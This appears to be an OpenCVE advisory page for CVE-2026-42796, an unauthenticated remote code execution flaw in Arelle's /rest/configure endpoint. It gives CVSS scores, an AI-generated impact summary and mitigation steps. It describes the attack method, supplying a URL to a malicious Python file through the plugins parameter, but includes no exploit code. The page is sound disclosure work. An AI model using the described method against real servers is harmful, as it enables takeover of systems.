Description
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
Published: 2026-05-04
Score: 9.2 Critical
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Arelle versions earlier than 2.39.10 expose an unauthenticated remote code execution flaw within the /rest/configure REST endpoint. The endpoint accepts a plugins query parameter and forwards the value unchecked to the plugin manager, allowing attackers to specify a URL pointing to a malicious Python file. The Arelle web server then downloads and executes the supplied code using the privileges granted to the Arelle process. This flaw provides attackers with the ability to run arbitrary code with the same permissions as the server, potentially compromising confidentiality, integrity, or availability of the system.

Affected Systems

The affected product is Arelle, all releases prior to 2.39.10. Users deploying Arelle before the 2.39.10 release are at risk if the /rest/configure endpoint is reachable over the network.

Risk and Exploitability

The vulnerability has a CVSS score of 9.2, indicating a high‑severity risk. EPSS data is not available, but the absence of a KEV listing does not reduce the danger; attackers can exploit the exposed endpoint remotely without any need for authentication or privilege escalation steps. The likely attack vector is a web‑based request to the vulnerable endpoint from an external attacker, which then triggers the download and execution of attacker‑controlled code within the Arelle process.

Generated by OpenCVE AI on May 4, 2026 at 18:53 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Arelle to version 2.39.10 or later.
  • Restrict or disable access to the /rest/configure endpoint until the patch is applied, such as by firewall rules or network segmentation.
  • Review and cleanse plugin configurations to ensure only trusted plugins are enabled and no external URLs are specified.

Generated by OpenCVE AI on May 4, 2026 at 18:53 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 04 May 2026 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Mon, 04 May 2026 20:15:00 +0000

Type Values Removed Values Added
First Time appeared Arelle
Arelle arelle
Vendors & Products Arelle
Arelle arelle

Mon, 04 May 2026 17:45:00 +0000

Type Values Removed Values Added
Description Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
Title Arelle < 2.39.10 Unauthenticated RCE via /rest/configure
Weaknesses CWE-306
References
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}

cvssV4_0

{'score': 9.2, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}

Subscriptions

Arelle Arelle
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-04T20:21:36.238Z

Reserved: 2026-04-29T20:58:22.764Z

Link: CVE-2026-42796

cve-icon Vulnrichment

Updated: 2026-05-04T20:21:32.628Z

cve-icon NVD

Status : Received

Published: 2026-05-04T18:16:32.520

Modified: 2026-05-04T18:16:32.520

Link: CVE-2026-42796

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-04T19:43:52Z

Weaknesses